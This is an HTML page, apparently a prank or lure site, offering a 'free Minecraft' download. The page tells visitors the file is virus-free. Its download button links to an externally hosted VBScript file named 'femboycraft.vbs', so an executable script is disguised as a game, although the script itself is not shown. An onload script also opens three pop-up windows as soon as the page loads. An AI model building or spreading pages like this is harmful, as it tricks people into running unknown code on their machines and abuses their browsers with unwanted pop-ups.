<!DOCTYPE html>
<html>
<head>
    <title>скачать бесплатно майнкрафт на нашем сайте</title>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="icon" type="image/x-icon" href="pauli/favicon.ico">
    
<style> 
    h1 {
        font-size: 80px;
        text-align: center;
    }
    p{
        text-align: center;
        font-size: 40px;
    }
    body {
        background-image: url('pauli/oblaka.png');
    }
    div {
        position: absolute; /*or fixed*/
        right: 300px;
        top: 450px;
        
    }
    p2 {
        color: red;
        text-align: center;
        font-size: 40px;
        
    }

    @media screen and (max-width: 1000px) {
        img.stif {
            width: 75%;
        }
        H1 {
            font-size: 60px;
        }
        p{
            font-size: 30px;
        }
        div {
            text-align: center;
            position:static;
            right: 0px;
        }
    }

    @media screen and (max-width: 600px) {
        img.stif {
            width: 100%;
        }
        H1 {
            font-size: 45px;
        }
        p{
        font-size: 22px;
        }
    }

</style>

</head>
<body>
    

<h1>не подозрительный русский сайт</h1>
<p>you download free Minecraft! в этом файле нет вирусов </p>
<img class="stif" src="pauli/bafstiv.jpg" width="50%">

<div>
    <a href="https://www.mediafire.com/file/m9gwac4x955c0zj/femboycraft.vbs/file" download="https://www.mediafire.com/file/m9gwac4x955c0zj/femboycraft.vbs/file">
        <img src="pauli/daunloud.jfif" width="256" height="256">
    </a>
    
</div>
<br>
<br>
<br>
<br>
<br>
<br>
<p2>hình ảnh từ thư viện trò chơi của trò chơi Minecraft đây là hình ảnh trong nội dung trò chơi</p2>





</body>
<script>
    window.onload = function() {
        for (var i = 0; i < 3; i++) {
            var popup = window.open('pauli/popup.html', '_blank', 'width=500,height=500,resizable=0');
            popup.focus();
        }
    };
</script>

</html>